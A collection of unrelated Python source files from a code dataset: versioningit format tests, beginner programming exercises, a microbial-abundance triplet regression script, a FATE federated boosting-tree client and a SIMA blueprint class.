"distance": 5,
"vcs": "g",
"rev": "abcdef0",
"build_date": BUILD_DATE,
},
),
"0.1.0",
"0.2.0",
{"distance": "{next_version}+{branch}.{rev}"},
"0.2.0+None.abcdef0",
),
(
VCSDescription(
tag="v0.1.0",
state="weird",
branch="main",
fields={
"distance": 5,
"vcs": "g",
"rev": "abcdef0",
"build_date": BUILD_DATE,
},
),
"0.1.0",
"0.2.0",
{"weird": "{version}+{branch}.{build_date:%Y.%m.%d}"},
"0.1.0+main.2038.01.19",
),
],
)
def test_basic_format(
caplog: pytest.LogCaptureFixture,
description: VCSDescription,
version: str,
next_version: str,
params: Dict[str, Any],
r: str,
) -> None:
assert (
basic_format(
description=description,
version=version,
next_version=next_version,
**params
)
== r
)
assert caplog.record_tuples == []
def test_basic_format_invalid_state(caplog: pytest.LogCaptureFixture) -> None:
with pytest.raises(ConfigError) as excinfo:
basic_format(
description=VCSDescription(
tag="v0.1.0",
state="weird",
branch="main",
fields={
"distance": 5,
"vcs": "g",
"rev": "abcdef0",
"build_date": BUILD_DATE,
},
),
version="0.1.0",
next_version="0.2.0",
)
assert str(excinfo.value) == (
"No format string for 'weird' state found in tool.versioningit.format"
)
assert caplog.record_tuples == []
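# For reference, the default per-state format strings exercised above can be read
# off the expected outputs (this is an inference from the test data, not a quote
# of the library's source):
#   distance:       "{version}.post{distance}+{vcs}{rev}"
#   dirty:          "{version}+d{build_date:%Y%m%d}"
#   distance-dirty: "{version}.post{distance}+{vcs}{rev}.d{build_date:%Y%m%d}"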
|
StarcoderdataPython
|
11249274
|
default_app_config = 'autodrp.apps.AutoDRPConfig'
|
StarcoderdataPython
|
3442805
|
#71 Write input() and output() functions to read in and print out the records of 5 students
student = []
def input_stu(stu, num):
for i in range(5):
stu.append(['', '', []])
for i in range(num):
stu[i][0] = input('input the num:\n')
stu[i][1] = input('input the name:\n')
for j in range(2):
stu[i][2].append(int(input('input the score:\n')))
def output_stu(stu):
for i in range(len(stu)):
print('%-6s%-10s' % (stu[i][0], stu[i][1]))
for j in range(len(stu[i][2])):
print('%-8d' % stu[i][2][j])
#input_stu(student, 3)
#output_stu(student)
#72 Create a linked list
def create_link():
pLink = []
for i in range(20):
pLink.append(i)
print('this is the pLink', pLink)
#create_link()
#73 Problem: print a list in reverse order.
def create_reverse_link():
pLink = []
for i in range(20):
pLink.append(i)
pLink.reverse()
print('this is the pLink to reverse print: ', pLink)
#create_reverse_link()
#74. Problem: sort a list and concatenate two lists.
def sorted_and_linked():
head = [1,3,2,5,9,110,67]
tail = [111,45,89]
head.sort()
print('this is sorted the head: ', head)
    # head + tail would also work
head.extend(tail)
print('this is to extend the head and tail :', head)
#sorted_and_linked()
#75. Take a break -- a simple exercise
# (the trivial conditional exercise is skipped here)
#76. Problem: write a function; when n is even compute 1/2 + 1/4 + ... + 1/n, and when n is odd compute 1/1 + 1/3 + ... + 1/n
def sum_num(n):
x = 0
if n % 2 == 0:
x = 2
else:
x = 1
sum_x = 0
for i in range(x, n+1, 2):
sum_x += 1/i
print('this is the sum_x: %f ' % sum_x)
sum_num(6)
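# e.g. for n = 6 the call above computes 1/2 + 1/4 + 1/6 ≈ 0.916667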
#77. Problem: loop over a list and print its elements
def rotation_list():
ary = [1, 2, 4, 5, 3]
for value in enumerate(ary):
print('this is the key: %d , value: %d' %(value[0], value[1]))
rotation_list()
#78 Problem: find the oldest person and print them. Try to spot what is wrong with the program.
def find_max_age():
persons = {"a": 18, "b": 20, "c": 34}
max_person = ""
for x in persons.keys():
if max_person == '':
max_person = x
if persons[x] > persons[max_person]:
max_person = x
print("this is the max person %s and age is %d " % (max_person, persons[max_person]) )
find_max_age()
#79 Problem: sort two strings.
def sort_str(str1, str2):
if str1 < str2:
return str1, str2
else:
return str2, str1
print(sort_str('b', 'a'))
#80 Problem: there is a pile of peaches on a beach and five monkeys come to share it. The first monkey
# divides the pile into five equal shares with one peach left over, throws the extra peach into the sea
# and takes one share away. The second monkey divides the remainder into five equal shares, again with
# one left over, throws the extra one into the sea and takes a share; the third, fourth and fifth
# monkeys all do the same. What is the smallest number of peaches the pile could have started with?
def distribution_things(n, x):
if x == 0:
return n
n = n * 5 + 1
x = x-1
return distribution_things(n, x)
print(distribution_things(1, 5))
|
StarcoderdataPython
|
6595024
|
<filename>linear_model/model_pick/random_forest/triplets_wei.py<gh_stars>0
import copy
import itertools
import re
import sys
from difflib import SequenceMatcher
import numpy as np
import pandas as pd
import scipy
import scipy.spatial.distance
import scipy.stats
import statsmodels.formula.api as sm
global tax_thr
tax_thr = 0
class Graph:
def __init__(self):
self.nodes = []
self.len = 0
self.wh_len = 0
def add_node(self, n):
present = self.find(n)
if present is None:
self.nodes.append(Node(n))
self.nodes[-1].index = len(self.nodes) - 1
self.len += 1
self.wh_len += 1
return (self.nodes[-1])
else:
return (present)
def find(self, name):
for n in self.nodes:
if n.name == name:
return (n)
return (None)
def add_edge(self, name1, name2):
N = [name1, name2]
present = [self.find(el) for el in N]
for i in range(2):
if present[i] is None:
new_node = self.add_node(N[i])
present[i] = new_node
a = self.find(name1)
b = self.find(name2)
a.neigh.append(b)
b.neigh.append(a)
def add_weighted_edge(self, i, j, pairG):
if (pairG.nodes[i] in pairG.nodes[j].neigh):
self.nodes[i].neigh += [self.nodes[j]]
self.nodes[j].neigh += [self.nodes[i]]
self.nodes[j].neigh = list(set(self.nodes[j].neigh))
self.nodes[i].neigh = list(set(self.nodes[i].neigh))
self.nodes[j].weight[self.nodes[i]] += 1
self.nodes[i].weight[self.nodes[j]] += 1
class Node:
def __init__(self, name):
self.name = name
self.neigh = []
self.color = 'white'
self.index = None
self.weight = {}
# No dots in dimnames!
# in: data with meta_data on pair graph (practically, an edge list), path to counts table
# out: edge list for triplets, table with triplet model parameters
def reduce_to_triplets(fstats, counts):
##################################
# Takes in a meta-df for double models!
def table_to_graph(df):
G = Graph()
for i in range(1, len(df)):
edge = df.iloc[i]
G.add_edge(edge[0], edge[1])
return (G)
def tr_neighs(root):
closest = [list(x) for x in itertools.combinations(root.neigh, 2)]
far = {k: k.neigh for k in root.neigh if k.neigh != root}
temp = []
for el in far:
for i in far[el]:
temp.append([el] + [i])
all = closest + temp
all = [el for el in all if (root not in el)]
all = [el + [root] for el in all]
return (all)
def remove_zeroes(df):
# ((df.T == 2).all() == False).all()
# is true, if no lines have zero values
if not ((df.T == 0).all() == False).all():
# Remember one zero line
zero_line = df[(df.T == 0).all()].iloc[0]
# Now remove all zeros
df = df[(df.T != 0).any()]
# And add our zero-line
            df = df.append(zero_line)
return (df)
def md_remove_outliers(df):
        inv_cov = np.linalg.inv(df.cov().as_matrix())  # mahalanobis() expects the inverse covariance
means = df.mean().as_matrix()
md = df.apply((lambda x: scipy.spatial.distance.mahalanobis(x, means, inv_cov)), axis=1)
# Q =scipy.stats.chi2.cdf(md, df.shape[1])
Q = scipy.stats.chi2.ppf(0.975, df.shape[1])
df = df[md < Q]
return (df)
def remove_outliers(df):
q = df.quantile([0.025, 0.975])
filt_df = df[(df.iloc[:, 0] > q.iloc[0, 0]) &
(df.iloc[:, 1] > q.iloc[0, 1]) &
(df.iloc[:, 2] > q.iloc[0, 2]) &
(df.iloc[:, 0] < q.iloc[1, 0]) &
(df.iloc[:, 1] < q.iloc[1, 1]) &
(df.iloc[:, 2] < q.iloc[1, 2])]
return (filt_df)
all_models = pd.DataFrame([np.nan] * 6,
index=['Response', 'Predictor1', 'Predictor2', 'Coef_p1', 'Coef_p2', 'Intercept']).T
all_models.drop(0, 0)
# Col: species; Row: samples
do = table_to_graph(fstats)
# Recursion depth issue
# tr = copy.deepcopy(do)
tr = table_to_graph(fstats)
# Add zero weight to all edges
# Later this weight will be showing the number of 3-models
# with this particular pair of taxons
# Then erase all edges, as we are making a new graph,
# although containing all the vertices for double graph
for n in tr.nodes:
n.weight = {x: 0 for x in n.neigh}
n.neigh = []
print('Nodes in pair graph: ' + str(do.len))
# For each node see all possible triplets that contain it
# Then check if corresponding triplet linear models are better than pair-models
# If they are --
computed = []
for i in range(do.len):
sets = tr_neighs(do.nodes[i])
# Get IDs of all vertices in all triplets to quickly look them up in our graph
temp = copy.copy(sets)
# Remove set if it has 1 black vertex
# Black vertex means all triplets containing have been accounted for previously
for el in temp:
colors = [j.color for j in el]
if 'black' in colors:
sets.remove(el)
# zip(set_indices, set_names)
indices_and_names = [([el.index for el in j],[el.name for el in j]) for j in sets]
# Now calculate models for the sets
# for ind, na in zip(set_indices, set_names):
for ind, na in indices_and_names:
pairs = list(itertools.permutations([na[0],na[1],na[2]], 2))
# Make sure there are no dublicates
test = any([x[0] == x[1] for x in pairs])
taxons = ['s__','g__', 'f__', 'o__', 'c__', 'p__']
tax_name = taxons[tax_thr]
if not(test):
for pair in pairs:
temp = SequenceMatcher(None, pair[0],pair[1])
temp = temp.find_longest_match(0, len(pair[0]), 0, len(pair[1]))
lcs = pair[0][temp[0]:(temp[0] + temp[2])]
if (tax_name in lcs):
test = True
if test:
continue
# How this line even works?
# Is counts a df? Or what?
temp = counts[[na[0], na[1], na[2]]]
temp = remove_zeroes(temp)
temp = remove_outliers(temp)
orders = [[na[i]] + [p for p in na if p != na[i]] for i in range(len(na))]
for order in orders:
resp = order[0]
pred1 = order[1]
pred2 = order[2]
text = resp + ' ~ ' + pred1 + ' + ' + pred2
if ([resp,pred1,pred2] in computed) or ([resp,pred2,pred1] in computed):
continue
computed.append(order)
if not (temp.empty):
model = sm.ols(formula=text, data=temp).fit()
# Pick a threshold
# First get all F-stats for all 6 possible pair models within a triplet
sub_meta = fstats[
((fstats['Response'] == na[0]) & (fstats['Predictor'] == na[1])) |
((fstats['Response'] == na[0]) & (fstats['Predictor'] == na[2])) |
((fstats['Response'] == na[1]) & (fstats['Predictor'] == na[2])) |
((fstats['Response'] == na[1]) & (fstats['Predictor'] == na[0])) |
((fstats['Response'] == na[2]) & (fstats['Predictor'] == na[0])) |
((fstats['Response'] == na[2]) & (fstats['Predictor'] == na[1]))
]
# Now pick the smallest one
# It is now your threshold for letting the triplet model in
cut = min(sub_meta.ix[:, 'F_Stat'])
if model.f_pvalue < cut:
new_row = pd.DataFrame(
[resp, pred1, pred2, model.f_pvalue, model.params[pred1], model.params[pred2], model.params['Intercept']],
index=['Response', 'Predictor1', 'Predictor2', 'F_Stat', 'Coef_p1', 'Coef_p2', 'Intercept']).T
all_models = all_models.append(new_row)
poss_edges = itertools.combinations(ind, 2)
# Add weights to our graph
for el in poss_edges:
tr.add_weighted_edge(el[0], el[1], do)
# Finally, paint the seed vertex black: we are not coming back here
do.nodes[i].color = 'black'
# Remove zero-neighbor vertices
tr.nodes = [el for el in tr.nodes if len(el.neigh) > 1]
# Remove zero-weight edges from graph
for el in tr.nodes:
el.weight = {x: y for x, y in el.weight.items() if y > 0}
return (tr, all_models)
# in: graph for triplets
# out: adjacency table w/out weights
def turn_3_graph_to_adj_table(graph):
adj = []
for n in graph.nodes:
adj.append([n.name])
for el in n.neigh:
adj[-1] += [el.name]
return (adj)
# in: graph for triplets
# out: list of edges with weights
def turn_3_graph_to_edge_list(graph):
edges = []
for el in graph.nodes:
edges += [sorted([el.name, i.name]) + [el.weight[i]] for i in el.neigh]
temp = [i[0] + '\t' + i[1] + '\t' + str(i[2]) for i in edges]
temp = sorted(list(set(temp)))
return (temp)
def return_tax_names(ID_to_taxon, profiles):
tax_code = {}
profiles = pd.read_table(profiles, header=0, index_col=0, sep='\t', engine = 'python')
with open(ID_to_taxon) as f:
for line in f.read().splitlines():
temp = line.split()
# tax ID is in the 1st column tax name -- 2nd
tax_code[temp[0]] = temp[1]
profiles.index = [tax_code[x] for x in profiles.index]
return (profiles)
def code_tax_names(taxon_to_ID, profiles):
tax_code = {}
profiles = pd.read_table(profiles, header=0, index_col=0, sep='\t', engine = 'python')
with open(taxon_to_ID) as f:
for line in f.read().splitlines():
temp = line.split()
# tax ID is in the 1st column tax name -- 2nd
tax_code[temp[1]] = temp[0]
profiles.index = [tax_code[x] for x in profiles.index]
return (profiles)
def fstat_to_triplet_edges(pair_mod, counts, path_out):
# Make replacemens in data to avoid further confusion
# E.g. KEGG considers Ruminococcus to be in Ruminococcacea
# While Greengenes -- in Lachnospiraceae
def prepair_counts_and_edges(counts, pair_mod):
# counts.index = [re.sub(r'_x(\w+)x$', r'_\1', x) for x in counts.index]
# counts.index = [re.sub(r'_x(\w+)x(?=,)', r'_\1', x) for x in counts.index]
# counts.index = [re.sub(r'c__Erysipelotrichi$|c__Erysipelotrichi(?=,)', 'c__Erysipelotrichia', x) for x in
# counts.index]
# counts.index = [re.sub(r'f__Lachnospiraceae(?=,g__Ruminococcus)', 'f__Ruminococcaceae', x) for x in
# counts.index]
# pair_mod = pair_mod.replace({r'_x(\w+)x$': r'_\1'}, regex=True)
# pair_mod = pair_mod.replace({r'_x(\w+)x(?=,)': r'_\1'}, regex=True)
# pair_mod = pair_mod.replace({r'c__Erysipelotrichi$|c__Erysipelotrichi(?=,)': 'c__Erysipelotrichia'}, regex=True)
# pair_mod = pair_mod.replace({r'f__Lachnospiraceae(?=,g__Ruminococcus)': 'f__Ruminococcaceae'}, regex=True)
# Model calling can't work with commas or brackets in variable names
counts.index = [x.replace(',', '00') for x in counts.index]
counts = counts.T
pair_mod['Response'] = pair_mod['Response'].str.replace(',', '00')
pair_mod['Predictor'] = pair_mod['Predictor'].str.replace(',', '00')
return (counts, pair_mod)
with open(pair_mod) as f:
if f.readline() == 'No significant models\n':
fail = 'No pair models to base triple models on'
outfile = path_out + 'all_triplet_models.txt'
with open(outfile, 'w') as out:
out.write(fail)
return ()
a = pd.read_table(pair_mod, header=0, index_col=None, engine = 'python')
# NEW LINE!
counts, a = prepair_counts_and_edges(counts, a)
tr = reduce_to_triplets(a, counts)
out = turn_3_graph_to_edge_list(tr[0])
out = [i.replace('00', ',') for i in out]
model_table = tr[1]
model_table.index = range(0, model_table.shape[0])
model_table.drop(0, 0, inplace=True)
with open(path_out + 'triplet_edges.txt', 'a') as f:
for line in out:
f.write(line + '\n')
out_model = path_out + 'all_triplet_models.txt'
model_table = model_table[['Response', 'Predictor1', 'Predictor2', 'F_Stat', 'Coef_p1', 'Coef_p2', 'Intercept', ]]
model_table = model_table.replace(re.compile(r'(?<=\w)00(?=\w)'), ',')
model_table.to_csv(out_model, sep='\t', index=False)
return(model_table)
p_pair_edges = sys.argv[1]
p_counts = sys.argv[2]
tax_code = sys.argv[3]
p_out = sys.argv[4]
if p_out[-1] != '/':
p_out += '/'
# counts = return_taxonomies(p_counts, tax_code)
counts = return_tax_names(tax_code, p_counts)
x = fstat_to_triplet_edges(p_pair_edges, counts, p_out)
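# Illustrative invocation (file names are hypothetical). The script expects, in order,
# the pair-model table, the taxon count matrix, the taxon-ID mapping and an output
# directory, and writes triplet_edges.txt and all_triplet_models.txt into the latter:
#   python triplets_wei.py all_pair_models.txt counts.tsv taxon_ids.txt results/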
|
StarcoderdataPython
|
3300151
|
from federatedml.feature.fate_element_type import NoneType
from operator import itemgetter
from federatedml.param.evaluation_param import EvaluateParam
from federatedml.protobuf.generated.boosting_tree_model_meta_pb2 import BoostingTreeModelMeta
from federatedml.protobuf.generated.boosting_tree_model_meta_pb2 import ObjectiveMeta
from federatedml.protobuf.generated.boosting_tree_model_meta_pb2 import QuantileMeta
from federatedml.protobuf.generated.boosting_tree_model_param_pb2 import BoostingTreeModelParam
from federatedml.protobuf.generated.boosting_tree_model_param_pb2 import FeatureImportanceInfo
from federatedml.transfer_variable.transfer_class.homo_secure_boost_transfer_variable import \
HomoSecureBoostingTreeTransferVariable
from federatedml.util import consts
from federatedml.loss import SigmoidBinaryCrossEntropyLoss
from federatedml.loss import SoftmaxCrossEntropyLoss
from federatedml.loss import LeastSquaredErrorLoss
from federatedml.loss import HuberLoss
from federatedml.loss import LeastAbsoluteErrorLoss
from federatedml.loss import TweedieLoss
from federatedml.loss import LogCoshLoss
from federatedml.loss import FairLoss
from federatedml.tree import BoostingTree
from federatedml.tree import HomoDecisionTreeClient
from federatedml.tree import SecureBoostClientAggregator
from federatedml.feature.homo_feature_binning.homo_split_points import HomoFeatureBinningClient
import functools
from numpy import random
from typing import List, Tuple
import numpy as np
from arch.api.utils import log_utils
from federatedml.model_selection.k_fold import KFold
from federatedml.util.classify_label_checker import ClassifyLabelChecker, RegressionLabelChecker
LOGGER = log_utils.getLogger()
class HomoSecureBoostingTreeClient(BoostingTree):
def __init__(self):
super(HomoSecureBoostingTreeClient, self).__init__()
self.mode = consts.HOMO
self.validation_strategy = None
self.loss_fn = None
self.cur_sample_weights = None
self.y = None
self.y_hat = None
self.y_hat_predict = None
self.feature_num = None
self.num_classes = 2
self.tree_dim = 1
self.trees = []
self.feature_importance = {}
self.transfer_inst = HomoSecureBoostingTreeTransferVariable()
self.role = None
self.data_bin = None
self.bin_split_points = None
self.bin_sparse_points = None
self.init_score = None
self.local_loss_history = []
self.classes_ = []
self.role = consts.GUEST
# store learnt model param
self.tree_meta = None
self.learnt_tree_param = []
self.aggregator = SecureBoostClientAggregator()
self.binning_obj = HomoFeatureBinningClient()
def set_loss_function(self, objective_param):
loss_type = objective_param.objective
params = objective_param.params
LOGGER.info("set objective, objective is {}".format(loss_type))
if self.task_type == consts.CLASSIFICATION:
if loss_type == "cross_entropy":
if self.num_classes == 2:
self.loss_fn = SigmoidBinaryCrossEntropyLoss()
else:
self.loss_fn = SoftmaxCrossEntropyLoss()
else:
raise NotImplementedError("objective %s not supported yet" % (loss_type))
elif self.task_type == consts.REGRESSION:
if loss_type == "lse":
self.loss_fn = LeastSquaredErrorLoss()
elif loss_type == "lae":
self.loss_fn = LeastAbsoluteErrorLoss()
elif loss_type == "huber":
self.loss_fn = HuberLoss(params[0])
elif loss_type == "fair":
self.loss_fn = FairLoss(params[0])
elif loss_type == "tweedie":
self.loss_fn = TweedieLoss(params[0])
elif loss_type == "log_cosh":
self.loss_fn = LogCoshLoss()
else:
raise NotImplementedError("objective %s not supported yet" % loss_type)
else:
raise NotImplementedError("objective %s not supported yet" % loss_type)
def federated_binning(self, data_instance):
if self.use_missing:
binning_result = self.binning_obj.average_run(data_instances=data_instance,
bin_num=self.bin_num, abnormal_list=[NoneType()])
else:
binning_result = self.binning_obj.average_run(data_instances=data_instance,
bin_num=self.bin_num)
return self.binning_obj.convert_feature_to_bin(data_instance, binning_result)
def compute_local_grad_and_hess(self, y_hat):
loss_method = self.loss_fn
if self.task_type == consts.CLASSIFICATION:
grad_and_hess = self.y.join(y_hat, lambda y, f_val:\
(loss_method.compute_grad(y, loss_method.predict(f_val)),\
loss_method.compute_hess(y, loss_method.predict(f_val))))
else:
grad_and_hess = self.y.join(y_hat, lambda y, f_val:
(loss_method.compute_grad(y, f_val),
loss_method.compute_hess(y, f_val)))
return grad_and_hess
def compute_local_loss(self, y, y_hat):
LOGGER.info('computing local loss')
loss_method = self.loss_fn
if self.objective_param.objective in ["lse", "lae", "logcosh", "tweedie", "log_cosh", "huber"]:
# regression tasks
y_predict = y_hat
else:
# classification tasks
y_predict = y_hat.mapValues(lambda val: loss_method.predict(val))
loss = loss_method.compute_loss(y, y_predict)
return float(loss)
@staticmethod
def get_subtree_grad_and_hess(g_h, t_idx: int):
"""
Args:
            g_h: table of (grad, hess) values, one pair per tree dimension
t_idx: tree index
Returns: grad and hess of sub tree
"""
LOGGER.info("get grad and hess of tree {}".format(t_idx))
grad_and_hess_subtree = g_h.mapValues(
lambda grad_and_hess: (grad_and_hess[0][t_idx], grad_and_hess[1][t_idx]))
return grad_and_hess_subtree
def sample_valid_feature(self):
if self.feature_num is None:
self.feature_num = self.bin_split_points.shape[0]
chosen_feature = random.choice(range(0, self.feature_num), \
max(1, int(self.subsample_feature_rate * self.feature_num)), replace=False)
valid_features = [False for i in range(self.feature_num)]
for fid in chosen_feature:
valid_features[fid] = True
return valid_features
@staticmethod
def add_y_hat(f_val, new_f_val, lr=0.1, idx=0):
f_val[idx] += lr * new_f_val
return f_val
def update_y_hat_val(self, new_val=None, mode='train', tree_idx=0):
LOGGER.debug('update y_hat value, current tree is {}'.format(tree_idx))
add_func = functools.partial(self.add_y_hat, lr=self.learning_rate, idx=tree_idx)
if mode == 'train':
self.y_hat = self.y_hat.join(new_val, add_func)
else:
self.y_hat_predict = self.y_hat_predict.join(new_val, add_func)
def update_feature_importance(self, tree_feature_importance):
for fid in tree_feature_importance:
if fid not in self.feature_importance:
self.feature_importance[fid] = 0
self.feature_importance[fid] += tree_feature_importance[fid]
def sync_feature_num(self):
self.transfer_inst.feature_number.remote(self.feature_num, role=consts.ARBITER, idx=-1, suffix=('feat_num', ))
def sync_local_loss(self, cur_loss: float, sample_num: int, suffix):
data = {'cur_loss': cur_loss, 'sample_num': sample_num}
self.transfer_inst.loss_status.remote(data, role=consts.ARBITER, idx=-1, suffix=suffix)
LOGGER.debug('loss status sent')
def sync_tree_dim(self, tree_dim: int):
self.transfer_inst.tree_dim.remote(tree_dim,suffix=('tree_dim', ))
LOGGER.debug('tree dim sent')
def sync_stop_flag(self, suffix) -> bool:
flag = self.transfer_inst.stop_flag.get(idx=0,suffix=suffix)
return flag
def check_labels(self, data_inst, ) -> List[int]:
LOGGER.debug('checking labels')
classes_ = None
if self.task_type == consts.CLASSIFICATION:
num_classes, classes_ = ClassifyLabelChecker.validate_label(data_inst)
else:
RegressionLabelChecker.validate_label(data_inst)
return classes_
def generate_flowid(self, round_num, tree_num):
LOGGER.info("generate flowid, flowid {}".format(self.flowid))
return ".".join(map(str, [self.flowid, round_num, tree_num]))
def label_alignment(self, labels: List[int]):
self.transfer_inst.local_labels.remote(labels, suffix=('label_align', ))
def get_valid_features(self, epoch_idx, t_idx):
valid_feature = self.transfer_inst.valid_features.get(idx=0, suffix=('valid_features', epoch_idx, t_idx))
return valid_feature
def fit(self, data_inst, validate_data = None,):
# binning
data_inst = self.data_alignment(data_inst)
self.data_bin, self.bin_split_points, self.bin_sparse_points = self.federated_binning(data_inst)
# fid mapping
self.gen_feature_fid_mapping(data_inst.schema)
# set feature_num
self.feature_num = self.bin_split_points.shape[0]
# sync feature num
self.sync_feature_num()
# initialize validation strategy
self.validation_strategy = self.init_validation_strategy(train_data=data_inst, validate_data=validate_data,)
# check labels
local_classes = self.check_labels(self.data_bin)
# sync label class and set y
if self.task_type == consts.CLASSIFICATION:
self.transfer_inst.local_labels.remote(local_classes, role=consts.ARBITER, suffix=('label_align', ))
new_label_mapping = self.transfer_inst.label_mapping.get(idx=0, suffix=('label_mapping', ))
self.classes_ = [new_label_mapping[k] for k in new_label_mapping]
# set labels
self.num_classes = len(new_label_mapping)
LOGGER.debug('num_classes is {}'.format(self.num_classes))
self.y = self.data_bin.mapValues(lambda instance: new_label_mapping[instance.label])
# set tree dimension
self.tree_dim = self.num_classes if self.num_classes > 2 else 1
else:
self.y = self.data_bin.mapValues(lambda instance: instance.label)
# set loss function
self.set_loss_function(self.objective_param)
# set y_hat_val
self.y_hat, self.init_score = self.loss_fn.initialize(self.y) if self.tree_dim == 1 else \
self.loss_fn.initialize(self.y, self.tree_dim)
for epoch_idx in range(self.num_trees):
g_h = self.compute_local_grad_and_hess(self.y_hat)
for t_idx in range(self.tree_dim):
valid_features = self.get_valid_features(epoch_idx, t_idx)
LOGGER.debug('valid features are {}'.format(valid_features))
subtree_g_h = self.get_subtree_grad_and_hess(g_h, t_idx)
flow_id = self.generate_flowid(epoch_idx, t_idx)
new_tree = HomoDecisionTreeClient(self.tree_param, self.data_bin, self.bin_split_points,
self.bin_sparse_points, subtree_g_h, valid_feature=valid_features
, epoch_idx=epoch_idx, role=self.role, flow_id=flow_id, tree_idx=\
t_idx, mode='train')
new_tree.fit()
# update y_hat_val
self.update_y_hat_val(new_val=new_tree.sample_weights, mode='train', tree_idx=t_idx)
self.trees.append(new_tree)
self.tree_meta, new_tree_param = new_tree.get_model()
self.learnt_tree_param.append(new_tree_param)
self.update_feature_importance(new_tree.get_feature_importance())
# sync loss status
loss = self.compute_local_loss(self.y, self.y_hat)
LOGGER.debug('local loss of epoch {} is {}'.format(epoch_idx, loss))
self.local_loss_history.append(loss)
self.aggregator.send_local_loss(loss, self.data_bin.count(), suffix=(epoch_idx,))
# validate
if self.validation_strategy:
self.validation_strategy.validate(self, epoch_idx)
# check stop flag if n_iter_no_change is True
if self.n_iter_no_change:
should_stop = self.aggregator.get_converge_status(suffix=(str(epoch_idx), ))
LOGGER.debug('got stop flag {}'.format(should_stop))
if should_stop:
LOGGER.debug('stop triggered')
break
LOGGER.debug('fitting tree {}/{}'.format(epoch_idx, self.num_trees))
LOGGER.debug('fitting homo decision tree done')
def predict(self, data_inst):
to_predict_data = self.data_alignment(data_inst)
init_score = self.init_score
self.y_hat_predict = data_inst.mapValues(lambda x: init_score)
round_num = len(self.learnt_tree_param) // self.tree_dim
idx = 0
for round_idx in range(round_num):
for tree_idx in range(self.tree_dim):
tree_inst = HomoDecisionTreeClient(tree_param=self.tree_param, mode='predict')
tree_inst.load_model(model_meta=self.tree_meta, model_param=self.learnt_tree_param[idx])
idx += 1
predict_val = tree_inst.predict(to_predict_data)
self.update_y_hat_val(predict_val, mode='predict', tree_idx=tree_idx)
predict_result = None
if self.task_type == consts.REGRESSION and \
self.objective_param.objective in ["lse", "lae", "huber", "log_cosh", "fair", "tweedie"]:
predict_result = to_predict_data.join(self.y_hat_predict,
lambda inst, pred: [inst.label, float(pred), float(pred),
{"label": float(pred)}])
elif self.task_type == consts.CLASSIFICATION:
classes_ = self.classes_
loss_func = self.loss_fn
if self.num_classes == 2:
predicts = self.y_hat_predict.mapValues(lambda f: float(loss_func.predict(f)))
threshold = self.predict_param.threshold
predict_result = to_predict_data.join(predicts, lambda inst, pred: [inst.label,
classes_[1] if pred > threshold else
classes_[0], pred,
{"0": 1 - pred, "1": pred}])
else:
predicts = self.y_hat_predict.mapValues(lambda f: loss_func.predict(f).tolist())
predict_result = to_predict_data.join(predicts, lambda inst, preds: [inst.label,\
classes_[np.argmax(preds)], np.max(preds), dict(zip(map(str, classes_), preds))])
return predict_result
def get_feature_importance(self):
return self.feature_importance
def get_model_meta(self):
model_meta = BoostingTreeModelMeta()
model_meta.tree_meta.CopyFrom(self.tree_meta)
model_meta.learning_rate = self.learning_rate
model_meta.num_trees = self.num_trees
model_meta.quantile_meta.CopyFrom(QuantileMeta(bin_num=self.bin_num))
model_meta.objective_meta.CopyFrom(ObjectiveMeta(objective=self.objective_param.objective,
param=self.objective_param.params))
model_meta.task_type = self.task_type
model_meta.n_iter_no_change = self.n_iter_no_change
model_meta.tol = self.tol
meta_name = "HomoSecureBoostingTreeGuestMeta"
return meta_name, model_meta
def set_model_meta(self, model_meta):
self.tree_meta = model_meta.tree_meta
self.learning_rate = model_meta.learning_rate
self.num_trees = model_meta.num_trees
self.bin_num = model_meta.quantile_meta.bin_num
self.objective_param.objective = model_meta.objective_meta.objective
self.objective_param.params = list(model_meta.objective_meta.param)
self.task_type = model_meta.task_type
self.n_iter_no_change = model_meta.n_iter_no_change
self.tol = model_meta.tol
def get_model_param(self):
model_param = BoostingTreeModelParam()
model_param.tree_num = len(list(self.learnt_tree_param))
model_param.tree_dim = self.tree_dim
model_param.trees_.extend(self.learnt_tree_param)
model_param.init_score.extend(self.init_score)
model_param.losses.extend(self.local_loss_history)
model_param.classes_.extend(map(str, self.classes_))
model_param.num_classes = self.num_classes
model_param.best_iteration = -1
feature_importance = list(self.get_feature_importance().items())
feature_importance = sorted(feature_importance, key=itemgetter(1), reverse=True)
feature_importance_param = []
for fid, _importance in feature_importance:
feature_importance_param.append(FeatureImportanceInfo(sitename=self.role,
fid=fid,
importance=_importance))
model_param.feature_importances.extend(feature_importance_param)
model_param.feature_name_fid_mapping.update(self.feature_name_fid_mapping)
param_name = "HomoSecureBoostingTreeGuestParam"
return param_name, model_param
def get_cur_model(self):
meta_name, meta_protobuf = self.get_model_meta()
param_name, param_protobuf = self.get_model_param()
return {meta_name: meta_protobuf,
param_name: param_protobuf
}
def set_model_param(self, model_param):
self.learnt_tree_param = list(model_param.trees_)
self.init_score = np.array(list(model_param.init_score))
self.local_loss_history = list(model_param.losses)
self.classes_ = list(model_param.classes_)
self.tree_dim = model_param.tree_dim
self.num_classes = model_param.num_classes
self.feature_name_fid_mapping.update(model_param.feature_name_fid_mapping)
def get_metrics_param(self):
if self.task_type == consts.CLASSIFICATION:
if self.num_classes == 2:
return EvaluateParam(eval_type="binary",
pos_label=self.classes_[1], metrics=self.metrics)
else:
return EvaluateParam(eval_type="multi", metrics=self.metrics)
else:
return EvaluateParam(eval_type="regression", metrics=self.metrics)
def export_model(self):
if self.need_cv:
return None
return self.get_cur_model()
def load_model(self, model_dict):
model_param = None
model_meta = None
for _, value in model_dict["model"].items():
for model in value:
if model.endswith("Meta"):
model_meta = value[model]
if model.endswith("Param"):
model_param = value[model]
LOGGER.info("load model")
self.set_model_meta(model_meta)
self.set_model_param(model_param)
self.set_loss_function(self.objective_param)
def cross_validation(self, data_instances):
if not self.need_run:
return data_instances
kflod_obj = KFold()
cv_param = self._get_cv_param()
kflod_obj.run(cv_param, data_instances, self, True)
return data_instances
|
StarcoderdataPython
|
6553748
|
#
# Generated with SNCurveItemBlueprint
from dmt.blueprint import Blueprint
from dmt.dimension import Dimension
from dmt.attribute import Attribute
from dmt.enum_attribute import EnumAttribute
from dmt.blueprint_attribute import BlueprintAttribute
from sima.sima.blueprints.moao import MOAOBlueprint
class SNCurveItemBlueprint(MOAOBlueprint):
""""""
def __init__(self, name="SNCurveItem", package_path="sima/post", description=""):
super().__init__(name,package_path,description)
self.attributes.append(Attribute("name","string","",default=""))
self.attributes.append(Attribute("description","string","",default=""))
self.attributes.append(Attribute("_id","string","",default=""))
